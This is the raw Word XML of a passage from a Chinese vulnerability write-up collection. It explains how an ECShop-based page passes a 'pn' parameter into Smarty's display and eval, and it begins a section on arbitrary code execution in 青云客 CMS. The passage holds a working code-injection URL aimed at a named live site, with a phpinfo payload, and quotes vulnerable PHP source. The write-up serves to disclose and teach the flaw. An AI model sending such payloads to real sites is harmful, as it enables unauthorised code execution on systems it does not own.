    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>们发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-67"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">pn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>没有指定，可以任意提交，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>推断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>应该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="34" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s4916" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.55pt;width:337.5pt;height:34.55pt;z-index:714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宋体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$smarty-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>display(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$_GET['p']);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</w:rPr>
        <w:t>员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写成以下代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s4841" style="position:absolute;left:0;text-align:left;margin-left:80.6pt;margin-top:18.05pt;width:337.75pt;height:165.2pt;z-index:7192;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,361" coordsize="6755,3304">
            <v:rect id="_x0000_s4915" style="position:absolute;left:1617;top:366;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4914" style="position:absolute;left:1797;top:609;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4913" style="position:absolute;left:2761;top:609;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4912" style="position:absolute;left:2881;top:609;width:1808;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4911" style="position:absolute;left:1617;top:872;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4910" type="#_x0000_t75" style="position:absolute;left:1797;top:935;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4909" style="position:absolute;left:1617;top:1198;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4908" style="position:absolute;left:1797;top:1261;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4907" style="position:absolute;left:1897;top:1261;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4906" style="position:absolute;left:1997;top:1261;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4905" style="position:absolute;left:2097;top:1261;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4904" style="position:absolute;left:2197;top:1261;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4903" style="position:absolute;left:2297;top:1261;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4902" style="position:absolute;left:2397;top:1261;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4901" style="position:absolute;left:2497;top:1261;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4900" style="position:absolute;left:2597;top:1261;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4899" style="position:absolute;left:1617;top:1524;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4898" style="position:absolute;left:1797;top:1587;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4897" style="position:absolute;left:1897;top:1587;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4896" style="position:absolute;left:1997;top:1587;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4895" style="position:absolute;left:2097;top:1587;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4894" style="position:absolute;left:2197;top:1587;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4893" style="position:absolute;left:2297;top:1587;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4892" style="position:absolute;left:2397;top:1587;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4891" style="position:absolute;left:2497;top:1587;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4890" style="position:absolute;left:2597;top:1587;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4889" style="position:absolute;left:3561;top:1587;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4888" style="position:absolute;left:3681;top:1587;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4887" style="position:absolute;left:3802;top:1587;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4886" style="position:absolute;left:3922;top:1587;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4885" style="position:absolute;left:4284;top:1587;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4884" style="position:absolute;left:4404;top:1587;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4883" style="position:absolute;left:4525;top:1587;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4882" style="position:absolute;left:4645;top:1587;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4881" style="position:absolute;left:1617;top:1850;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4880" style="position:absolute;left:1797;top:1913;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4879" style="position:absolute;left:1897;top:1913;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4878" style="position:absolute;left:1997;top:1913;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4877" style="position:absolute;left:2097;top:1913;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4876" style="position:absolute;left:2197;top:1913;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4875" style="position:absolute;left:2297;top:1913;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4874" style="position:absolute;left:2397;top:1913;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4873" style="position:absolute;left:2497;top:1913;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4872" style="position:absolute;left:2597;top:1913;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4871" style="position:absolute;left:3561;top:1913;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4870" style="position:absolute;left:3681;top:1913;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4869" style="position:absolute;left:3802;top:1913;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4868" style="position:absolute;left:3922;top:1913;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4867" style="position:absolute;left:1617;top:2176;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4866" style="position:absolute;left:1797;top:2239;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4865" style="position:absolute;left:1897;top:2239;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4864" style="position:absolute;left:1997;top:2239;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4863" style="position:absolute;left:2097;top:2239;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4862" style="position:absolute;left:2197;top:2239;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4861" style="position:absolute;left:2297;top:2239;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4860" style="position:absolute;left:2397;top:2239;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4859" style="position:absolute;left:2497;top:2239;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4858" style="position:absolute;left:2597;top:2239;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4857" style="position:absolute;left:1617;top:2502;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4856" style="position:absolute;left:1617;top:2828;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4855" style="position:absolute;left:1797;top:2891;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4854" style="position:absolute;left:1897;top:2891;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4853" style="position:absolute;left:1997;top:2891;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4852" style="position:absolute;left:2097;top:2891;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4851" style="position:absolute;left:2197;top:2891;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4850" style="position:absolute;left:2297;top:2891;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4849" style="position:absolute;left:2397;top:2891;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4848" style="position:absolute;left:2497;top:2891;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4847" style="position:absolute;left:2597;top:2891;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4846" style="position:absolute;left:3320;top:2891;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4845" style="position:absolute;left:3440;top:2891;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4844" style="position:absolute;left:1617;top:3154;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4843" type="#_x0000_t75" style="position:absolute;left:1797;top:3217;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s4842" type="#_x0000_t202" style="position:absolute;left:1614;top:364;width:6750;height:3299" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent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80020F">
                    <w:pPr>
                      <w:ind w:left="161" w:right="3655"/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_eval($content)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ob_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start(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4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eval(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'?' . '</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t xml:space="preserve">&gt;' .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trim(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$content));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="980" w:right="2255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$content = ob_get_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contents(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 ob_end_clean();</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="10"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="26"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1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$content;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找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-50"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">ecshop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的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 xml:space="preserve">display </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现里面用了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Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pP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提交以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="174" w:line="321" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId92">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana"/>
            <w:w w:val="95"/>
          </w:rPr>
          <w:t>http://www.crucco.com/huodongye.php?pn</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana"/>
            <w:w w:val="95"/>
          </w:rPr>
          <w:t>=str:%3C?php%20</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>phpinfo%28%29</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>;/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="234" w:lineRule="exact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会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>爱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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-79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phpinfo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>出来了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="234" w:lineRule="exact"/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0"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="12"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="1"/>
        <w:ind w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="青云客CMS前台任意代码执行"/>
      <w:bookmarkStart w:id="82" w:name="_bookmark37"/>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>青云客</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-121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CMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前台任意代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="23"/>
        <w:ind w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作者</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>c26</w: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4840" type="#_x0000_t202" style="width:337.5pt;height:34.5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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>api.php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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="23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1E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6595"/>
        <w:gridCol w:w="155"/>
        <w:gridCol w:w="1615"/>
      </w:tblGrid>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="4484"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left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292EF3">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="391" w:lineRule="auto"/>
              <w:ind w:left="180" w:right="194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 xml:space="preserve">&lt;?php </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console"/>
                <w:color w:val="333333"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ini_set("max_execution_time","1800"); </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>include('include/config.php'); include('include/function.php'); include('include/class_mysql.php'); nocache();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="391" w:lineRule="auto"/>
              <w:ind w:left="180" w:right="264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 xml:space="preserve">$tcz=array( </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console"/>
                <w:color w:val="333333"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>'log'=&gt;arg('log','all','url')</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
              <w:ind w:left="180" w:right="264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 xml:space="preserve">$db=new mysql(); </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console"/>
                <w:color w:val="333333"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>switch($tcz['log']){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="1095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...</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="124"/>
              <w:ind w:left="1095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case 'feedback_upload':</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6595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0" w:line="200" w:lineRule="exact"/>
              <w:ind w:left="2012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@$webdomain=$_SERVER['SERVER_NAME'];</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1615" w:type="dxa"/>
            <w:tcBorders>
